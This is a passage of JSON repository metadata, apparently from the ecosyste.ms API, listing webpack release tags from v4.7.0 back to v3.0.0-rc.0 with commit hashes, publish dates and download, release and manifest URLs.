2018-05-04T11:57:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.7.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.7.0/manifests"},{"name":"v4.6.0","sha":"e7c8fa414b718ac98d94a96e2553faceabfbc92f","kind":"tag","published_at":"2018-04-17T16:23:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.6.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.6.0/manifests"},{"name":"v4.5.0","sha":"e400445445a2f91d19aa8c79aa7b34b66011e661","kind":"tag","published_at":"2018-04-04T13:07:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.5.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.5.0/manifests"},{"name":"v4.4.1","sha":"0e404b8683d79052e3a6b42743bd3061f17a5a5d","kind":"tag","published_at":"2018-03-29T15:28:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.4.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.4.1/manifests"},{"name":"v4.4.0","sha":"e3bb8c9c8f5a30884b4df01bfbbc772cc1fb8cda","kind":"tag","published_at":"2018-03-29T14:57:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.4.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.4.0/manifests"},{"name":"v4.3.0","sha":"54ceb3c04d513ef5c7b78eaf4d391d14cfbe8282","kind":"tag","published_at":"2018-03-27T09:00:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.3.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.3.0/manifests"},{"name":"v4.2.0","sha":"d668a23fdc69c61ab80ec8db89a5b49778559534","kind":"tag","published_at":"2018-03-21T08:26:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.2.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.2.0/manifests"},{"name":"v4.1.1","sha":"41bb63ad69d0f32c042e74e732cb045b5966c452","kind":"tag","published_at":"2018-03-07T15:37:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.1.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.1.1/manifests"},{"name":"v4.1.0","sha":"f916fc0bb70585cf04a92cd99e004e4879f1d337","kind":"tag","published_at":"2018-03-04T10:39:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.1.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.1.0/manifests"},{"name":"v4.0.1","sha":"5044762c846a3a83a208853e48785a293fe9ef7d","kind":"tag","published_at":"2018-02-26T20:11:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.1/manifests"},{"name":"v4.0.0","sha":"213226ece261a0e89edb9de15fbc6775418f6041","kind":"tag","published_at":"2018-02-25T02:37:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0/manifests"},{"name":"v4.0.0-beta.3","sha":"4c25bfbaf2e01cf23708a381319b43367701e5b5","kind":"tag","published_at":"2018-02-24T14:55:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-beta.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-beta.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-beta.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.3/manifests"},{"name":"v4.0.0-beta.2","sha":"2ad530e4b486c248758f6d9d94070f207ef5f2e9","kind":"tag","published_at":"2018-02-17T13:10:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-beta.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-beta.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-beta.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.2/manifests"},{"name":"v3.11.0","sha":"bc840ec8747ba19c9e87629f2959ed2e65a9ffbe","kind":"tag","published_at":"2018-02-10T14:37:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.11.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.11.0/manifests"},{"name":"v4.0.0-beta.1","sha":"df65475ba32a5881f48ab9d90e1c010ea57c3d65","kind":"tag","published_at":"2018-02-10T14:10:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-beta.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-beta.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-beta.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.1/manifests"},{"name":"v4.0.0-beta.0","sha":"ae0dc62b7b4cc1ee3170c8ce3dd581ddcfa46a2a","kind":"tag","published_at":"2018-01-24T22:25:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-beta.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-beta.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-beta.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.0/manifests"},{"name":"v4.0.0-alpha.5","sha":"c302bba6a53601dcab5e86dce5778897710c86e1","kind":"tag","published_at":"2018-01-22T14:19:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.5","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-alpha.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.5/manifests"},{"name":"v4.0.0-alpha.4","sha":"37cc6f4f6ec178d0406dcf816de690cab9b1bf8f","kind":"tag","published_at":"2018-01-06T09:46:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.4","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-alpha.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.4/manifests"},{"name":"v4.0.0-alpha.3","sha":"9334fd8547831ded7f11e05319616a72ea0b4698","kind":"tag","published_at":"2018-01-04T21:24:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-alpha.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.3/manifests"},{"name":"v4.0.0-alpha.2","sha":"910d6fd40996189ee990fe90c69ab732cbd9963a","kind":"tag","published_at":"2017-12-22T11:49:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-alpha.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.2/manifests"},{"name":"v4.0.0-alpha.1","sha":"9a33e031d16008d690a188a2d784666c8a293b43","kind":"tag","published_at":"2017-12-14T15:08:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-alpha.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.1/manifests"},{"name":"v4.0.0-alpha.0","sha":"fd3c8025e5c32e625f68df2b030646a8c2a8467a","kind":"tag","published_at":"2017-12-04T19:52:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-alpha.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.0/manifests"},{"name":"v3.10.0","sha":"c71fd05f98a752753b9450f590c970b76379803d","kind":"tag","published_at":"2017-12-04T18:02:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.10.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.10.0/manifests"},{"name":"v3.9.1","sha":"5acbe2f72eaa67654904cf8a127c3ed4da12dc99","kind":"tag","published_at":"2017-11-30T17:10:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.9.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.9.1/manifests"},{"name":"v3.9.0","sha":"73e34a7306d40ed95d666058ad03e9c14de554af","kind":"tag","published_at":"2017-11-30T13:53:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.9.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.9.0/manifests"},{"name":"v3.8.1","sha":"b8e6b4a100a5d5a6387c276eb52d6c7f20954a0b","kind":"tag","published_at":"2017-10-17T15:20:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.8.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.8.1/manifests"},{"name":"v3.8.0","sha":"1dc561865ad57d9e862832ccf3579f67a8bbba2d","kind":"tag","published_at":"2017-10-17T09:15:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.8.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.8.0/manifests"},{"name":"v3.7.1","sha":"ce24e98bc084bf45a271fb05b14b0e9829686149","kind":"tag","published_at":"2017-10-11T19:39:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.7.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.7.1/manifests"},{"name":"v3.7.0","sha":"551ea76838f163a1e0fbf65182e2ac08d346a1f3","kind":"tag","published_at":"2017-10-11T18:07:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.7.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.7.0/manifests"},{"name":"v3.6.0","sha":"622675993d72c6ea7d70cd2e503fd9416f940b2b","kind":"tag","published_at":"2017-09-15T08:45:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.6.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.6.0/manifests"},{"name":"v3.5.6","sha":"92d5c209437f9ef9293571e24cc8dcf10459d578","kind":"tag","published_at":"2017-09-06T15:41:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.6","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.6/manifests"},{"name":"v3.5.5","sha":"ef6ab6820a74db730cfec6fd419d2c211d62c0bd","kind":"tag","published_at":"2017-08-16T14:55:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.5","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.5/manifests"},{"name":"v3.5.4","sha":"990563f9a2b3fb3e817b7e1b9d6841bcd1eaa51e","kind":"tag","published_at":"2017-08-12T09:16:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.4","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.4/manifests"},{"name":"v3.5.3","sha":"4b2b1ad99b86458983714c589c6495772b1292ee","kind":"tag","published_at":"2017-08-10T13:38:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.3","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.3/manifests"},{"name":"v3.5.2","sha":"25302e51a601b4e30a661d788471e4a50b7a9764","kind":"tag","published_at":"2017-08-09T10:51:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.2","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.2/manifests"},{"name":"v3.5.1","sha":"5be959311a746b976a0a56625cc4372307b351ed","kind":"tag","published_at":"2017-08-08T11:26:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.1/manifests"},{"name":"v3.5.0","sha":"75a8ffec0a8ab2f1f07a950ee965a31917af5fe9","kind":"tag","published_at":"2017-08-08T08:50:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.0/manifests"},{"name":"v3.4.1","sha":"1f064bc84f222305afada087f9631fd7ae39ea30","kind":"tag","published_at":"2017-07-26T08:48:55.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.4.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.4.1/manifests"},{"name":"v3.4.0","sha":"c8732c8d157ed56542d521a557dda7ff7ad12ffb","kind":"tag","published_at":"2017-07-25T14:27:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.4.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.4.0/manifests"},{"name":"v3.3.0","sha":"5b119e7c5b437fd48e7e681996b9be10cbd6de34","kind":"tag","published_at":"2017-07-15T13:52:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.3.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.3.0/manifests"},{"name":"v2.7.0","sha":"eeea490e8ec0e2341cd4bb6da82aabf6ca139322","kind":"tag","published_at":"2017-07-12T07:00:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.7.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.7.0/manifests"},{"name":"v3.2.0","sha":"d0059901266e54a22309c419cad6d9327767c5a3","kind":"tag","published_at":"2017-07-11T20:09:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.2.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.2.0/manifests"},{"name":"v3.1.0","sha":"4bb3018da4310deaeff52b8a1c2b5645282b9994","kind":"tag","published_at":"2017-07-06T21:57:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.1.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.1.0/manifests"},{"name":"v3.0.0","sha":"bf4ec9c26e8f6de76c3d3ec1371f3ca1c8999ca5","kind":"tag","published_at":"2017-06-19T15:37:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.0.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0/manifests"},{"name":"v3.0.0-rc.2","sha":"2ba04991056475509a4e45599a1f42e91cce6233","kind":"tag","published_at":"2017-06-14T21:46:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.0.0-rc.2","html_url":"https://github.com/webpack/webpack/releases/tag/v3.0.0-rc.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.0.0-rc.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.2/manifests"},{"name":"v3.0.0-rc.1","sha":"2e8b77ddcf66867b208dffce97fb94a87be48369","kind":"tag","published_at":"2017-06-07T11:33:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.0.0-rc.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.0.0-rc.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.0.0-rc.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.1/manifests"},{"name":"v3.0.0-rc.0","sha":"3d653290fafe385277b48e5a36807124618b9561","kind":"tag","published_at":"2017-06-05T14:12:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.0.